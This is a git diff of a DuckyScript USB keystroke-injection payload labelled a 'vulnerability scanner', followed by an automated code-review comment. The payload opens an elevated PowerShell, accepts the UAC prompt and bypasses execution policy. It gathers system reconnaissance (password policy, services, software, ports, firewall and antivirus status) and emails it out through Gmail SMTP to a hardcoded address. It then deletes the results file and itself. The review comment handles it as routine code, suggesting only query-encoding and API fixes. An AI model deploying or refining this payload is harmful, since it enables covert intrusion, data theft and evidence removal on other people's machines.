diff --git a/3.0. VulnerabilityScanner b/3.0. VulnerabilityScanner
index 32e9f9f..8f2ab62 100644
--- a/3.0. VulnerabilityScanner
+++ b/3.0. VulnerabilityScanner
@@ -1,345 +1,344 @@ REM script in progress -DELAY 5000 +DELAY 1000 REM Open Start Menu CONTROL ESCAPE DELAY 3000 STRING powershell -DELAY 3000 REM Navigate to the context menu to run PowerShell as an administrator -DELAY 1500 +DELAY 2000 RIGHTARROW -DELAY 1500 +DELAY 500 DOWNARROW -DELAY 1500 +DELAY 500 ENTER DELAY 5000 ALT Y DELAY 5000 REM Set PowerShell Execution Policy to Bypass -DELAY 500 -STRING Set-ExecutionPolicy Bypass -Scope Process -Force -DELAY 500 +DELAY 1000 +STRING set-executionpolicy bypass -scope process -force +DELAY 100 ENTER -DELAY 500 +DELAY 400 REM Create the PowerShell script in memory and execute it -DELAY 500 -STRING $securePassword = ConvertTo-SecureString 'YourAppSpecificPassword' -AsPlainText -Force -DELAY 500 +DELAY 100 +STRING $securepassword = convertto-securestring 'YourAppSpecificPassword' -asplaintext -force +DELAY 100 ENTER -DELAY 500 -STRING $credential = New-Object System.Management.Automation.PSCredential ('igrowsc@gmail.com', $securePassword) -DELAY 500 +DELAY 400 +STRING $credential = new-object system.management.automation.pscredential ('igrowsc@gmail.com', $securepassword) +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING $script = { -DELAY 500 +DELAY 100 ENTER -DELAY 500 -STRING function Check-PasswordPolicy { -DELAY 500 +DELAY 400 +STRING function check-passwordpolicy { +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING net accounts -DELAY 500 +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING } -DELAY 500 +DELAY 100 ENTER -DELAY 500 -STRING function Audit-Services { -DELAY 500 +DELAY 400 +STRING function audit-services { +DELAY 100 ENTER -DELAY 500 -STRING Get-Service | Select-Object Name, DisplayName, Status, StartType -DELAY 500 +DELAY 400 +STRING get-service | select-object name, displayname, status, starttype +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING } -DELAY 500 +DELAY 100 ENTER -DELAY 500 -STRING function Check-NetworkSettings { -DELAY 500 +DELAY 400 +STRING function check-networksettings { +DELAY 100 ENTER -DELAY 500 -STRING 
Get-NetIPConfiguration -DELAY 500 +DELAY 400 +STRING get-netipconfiguration +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING } -DELAY 500 +DELAY 100 ENTER -DELAY 500 -STRING function Check-SoftwareVulnerabilities { -DELAY 500 +DELAY 400 +STRING function check-softwarevulnerabilities { +DELAY 100 ENTER -DELAY 500 -STRING Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher -DELAY 500 +DELAY 400 +STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | select-object displayname, displayversion, publisher +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING } -DELAY 500 +DELAY 100 ENTER -DELAY 1000 -STRING function Check-CVE { -DELAY 1000 +DELAY 400 +STRING function check-cve { +DELAY 100 ENTER -DELAY 1000 +DELAY 400 STRING param ( -DELAY 1000 +DELAY 100 ENTER -DELAY 1000 -STRING [string]$productName, -DELAY 1000 +DELAY 400 +STRING [string]$productname, +DELAY 100 ENTER -DELAY 1000 +DELAY 400 STRING [string]$version -DELAY 1000 +DELAY 100 ENTER -DELAY 1000 +DELAY 400 STRING ) -DELAY 1000 +DELAY 100 ENTER -DELAY 1000 -STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productName+$version" -DELAY 1000 +DELAY 400 +STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productname+$version" +DELAY 100 ENTER -DELAY 1000 -STRING Start-Sleep -Seconds 5 -DELAY 500 +DELAY 400 +STRING start-sleep -seconds 5 +DELAY 100 ENTER -DELAY 500 -STRING $response = Invoke-RestMethod -Uri $uri -Method Get -DELAY 1000 +DELAY 400 +STRING $response = invoke-restmethod -uri $uri -method get +DELAY 100 ENTER -DELAY 1000 -STRING if ($response.totalResults -gt 0) { -DELAY 500 +DELAY 400 +STRING if ($response.totalresults -gt 0) { +DELAY 100 ENTER -DELAY 500 -STRING foreach ($cve in $response.result.CVE_Items) { -DELAY 500 +DELAY 400 +STRING foreach ($cve in $response.result.cve_items) { +DELAY 100 ENTER -DELAY 500 -STRING 
"$($cve.cve.CVE_data_meta.ID) - $($cve.cve.description.description_data[0].value)" -DELAY 500 +DELAY 400 +STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)" +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING } -DELAY 500 +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING } else { -DELAY 500 +DELAY 100 ENTER -DELAY 500 -STRING "No CVEs found for $productName $version" -DELAY 500 +DELAY 400 +STRING "no cves found for $productname $version" +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING } -DELAY 500 +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING } -DELAY 500 +DELAY 100 ENTER -DELAY 500 -STRING function Analyze-Logs { -DELAY 500 +DELAY 400 +STRING function analyze-logs { +DELAY 100 ENTER -DELAY 500 -STRING Get-EventLog -LogName System -Newest 100 -DELAY 500 +DELAY 400 +STRING get-eventlog -logname system -newest 100 +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING } -DELAY 500 +DELAY 100 ENTER -DELAY 500 -STRING function Check-OpenPorts { -DELAY 500 +DELAY 400 +STRING function check-openports { +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING netstat -an -DELAY 500 +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING } -DELAY 500 +DELAY 100 ENTER -DELAY 500 -STRING function Check-MissingUpdates { -DELAY 500 +DELAY 400 +STRING function check-missingupdates { +DELAY 100 ENTER -DELAY 500 -STRING Get-WindowsUpdateLog -DELAY 500 +DELAY 400 +STRING get-windowsupdatelog +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING } -DELAY 500 +DELAY 100 ENTER -DELAY 500 -STRING function Check-FirewallStatus { -DELAY 500 +DELAY 400 +STRING function check-firewallstatus { +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING netsh advfirewall show allprofiles -DELAY 500 +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING } -DELAY 500 +DELAY 100 ENTER -DELAY 500 -STRING function Check-SMBv1Status { -DELAY 500 +DELAY 400 +STRING function check-smbv1status { +DELAY 100 ENTER -DELAY 500 -STRING Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -DELAY 500 +DELAY 400 +STRING 
get-windowsoptionalfeature -online -featurename smb1protocol +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING } -DELAY 500 +DELAY 100 ENTER -DELAY 500 -STRING function Check-AntivirusStatus { -DELAY 500 +DELAY 400 +STRING function check-antivirusstatus { +DELAY 100 ENTER -DELAY 500 -STRING Get-MpComputerStatus -DELAY 500 +DELAY 400 +STRING get-mpcomputerstatus +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING } -DELAY 500 +DELAY 100 ENTER -DELAY 500 -STRING function Send-EmailAndCleanup { -DELAY 500 +DELAY 400 +STRING function send-emailandcleanup { +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING param ( -DELAY 500 +DELAY 100 ENTER -DELAY 500 -STRING [string]$smtpServer, -DELAY 500 +DELAY 400 +STRING [string]$smtpserver, +DELAY 100 ENTER -DELAY 500 -STRING [string]$smtpFrom, -DELAY 500 +DELAY 400 +STRING [string]$smtpfrom, +DELAY 100 ENTER -DELAY 500 -STRING [string]$smtpTo, -DELAY 500 +DELAY 400 +STRING [string]$smtpto, +DELAY 100 ENTER -DELAY 500 -STRING [string]$messageSubject, -DELAY 500 +DELAY 400 +STRING [string]$messagesubject, +DELAY 100 ENTER -DELAY 500 -STRING [string]$messageBody, -DELAY 500 +DELAY 400 +STRING [string]$messagebody, +DELAY 100 ENTER -DELAY 500 -STRING [string]$attachmentPath, -DELAY 500 +DELAY 400 +STRING [string]$attachmentpath, +DELAY 100 ENTER -DELAY 500 -STRING [System.Management.Automation.PSCredential]$credential -DELAY 500 +DELAY 400 +STRING [system.management.automation.pscredential]$credential +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING ) -DELAY 500 +DELAY 100 ENTER -DELAY 500 -STRING $smtp = New-Object Net.Mail.SmtpClient($smtpServer) -DELAY 500 +DELAY 400 +STRING $smtp = new-object net.mail.smtpclient($smtpserver) +DELAY 100 ENTER -DELAY 500 -STRING $smtp.Credentials = $credential -DELAY 500 +DELAY 400 +STRING $smtp.credentials = $credential +DELAY 100 ENTER -DELAY 500 -STRING $smtp.EnableSsl = $true -DELAY 500 +DELAY 400 +STRING $smtp.enablessl = $true +DELAY 100 ENTER -DELAY 500 -STRING $smtp.Send($smtpFrom, $smtpTo, 
$messageSubject, $messageBody + (Get-Content -Path $attachmentPath -Raw)) -DELAY 500 +DELAY 400 +STRING $smtp.send($smtpfrom, $smtpto, $messagesubject, $messagebody + (get-content -path $attachmentpath -raw)) +DELAY 100 ENTER -DELAY 500 -STRING Remove-Item -Path $attachmentPath -DELAY 500 +DELAY 400 +STRING remove-item -path $attachmentpath +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING } -DELAY 500 +DELAY 100 ENTER -DELAY 500 -STRING Check-PasswordPolicy > results.txt -DELAY 500 +DELAY 400 +STRING check-passwordpolicy > results.txt +DELAY 100 ENTER -DELAY 500 -STRING Audit-Services >> results.txt -DELAY 500 +DELAY 400 +STRING audit-services >> results.txt +DELAY 100 ENTER -DELAY 500 -STRING Check-NetworkSettings >> results.txt -DELAY 500 +DELAY 400 +STRING check-networksettings >> results.txt +DELAY 100 ENTER -DELAY 500 -STRING Check-SoftwareVulnerabilities >> results.txt -DELAY 500 +DELAY 400 +STRING check-softwarevulnerabilities >> results.txt +DELAY 100 ENTER -DELAY 500 -STRING Analyze-Logs >> results.txt -DELAY 500 +DELAY 400 +STRING analyze-logs >> results.txt +DELAY 100 ENTER -DELAY 500 -STRING Check-OpenPorts >> results.txt -DELAY 500 +DELAY 400 +STRING check-openports >> results.txt +DELAY 100 ENTER -DELAY 500 -STRING Check-MissingUpdates >> results.txt -DELAY 500 +DELAY 400 +STRING check-missingupdates >> results.txt +DELAY 100 ENTER -DELAY 500 -STRING Check-FirewallStatus >> results.txt -DELAY 500 +DELAY 400 +STRING check-firewallstatus >> results.txt +DELAY 100 ENTER -DELAY 500 -STRING Check-SMBv1Status >> results.txt -DELAY 500 +DELAY 400 +STRING check-smbv1status >> results.txt +DELAY 100 ENTER -DELAY 500 -STRING Check-AntivirusStatus >> results.txt -DELAY 500 +DELAY 400 +STRING check-antivirusstatus >> results.txt +DELAY 100 ENTER -DELAY 500 -STRING Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | ForEach-Object { Check-CVE -productName $_.DisplayName -version $_.DisplayVersion } >> results.txt -DELAY 500 
+DELAY 400 +STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | foreach-object { check-cve -productname $_.displayname -version $_.displayversion } >> results.txt +DELAY 100 ENTER -DELAY 500 -STRING Send-EmailAndCleanup -smtpServer "smtp.gmail.com" -smtpFrom "igrowsc@gmail.com" -smtpTo "igrowsc@gmail.com" -messageSubject "Vulnerability Scan Results" -messageBody "Attached are the results of the vulnerability scan." -attachmentPath "results.txt" -credential $credential -DELAY 500 +DELAY 400 +STRING send-emailandcleanup -smtpserver "smtp.gmail.com" -smtpfrom "igrowsc@gmail.com" -smtpto "igrowsc@gmail.com" -messagesubject "vulnerability scan results" -messagebody "attached are the results of the vulnerability scan." -attachmentpath "results.txt" -credential $credential +DELAY 100 ENTER -DELAY 500 -STRING Remove-Item -Path $MyInvocation.MyCommand.Path -DELAY 500 +DELAY 400 +STRING remove-item -path $myinvocation.mycommand.path +DELAY 100 ENTER -DELAY 500 +DELAY 400 STRING } -DELAY 500 +DELAY 100 ENTER -DELAY 500 -STRING Invoke-Command -ScriptBlock $script -DELAY 500 +DELAY 400 +STRING invoke-command -scriptblock $script +DELAY 100 ENTER DELAY 20000
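Review bot: In the `check-cve` block the new line `$uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productname+$version"` still interpolates the registry DisplayName/DisplayVersion into the query string unencoded, so a product name containing a space, `&` or `#` yields a malformed or truncated search, and the many Uninstall entries with no DisplayName (visible in the `get-itemproperty ... | foreach-object { check-cve ... }` pipeline) send an empty keyword. Guard and encode instead: `if (-not $productname) { return }` followed by `$uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$([uri]::EscapeDataString("$productname $version"))"`. Separately, the NVD 1.0 CVE API has been retired, so this request is expected to fail at runtime; the 2.0 endpoint takes `keywordSearch=` and returns a different shape (`vulnerabilities[].cve.id` and `descriptions`), so the `$response.totalresults` / `cve_items` parsing lines would need updating together with the URI. The lowercasing applied across the hunk is behaviour-neutral since PowerShell cmdlet, variable and property names are case-insensitive.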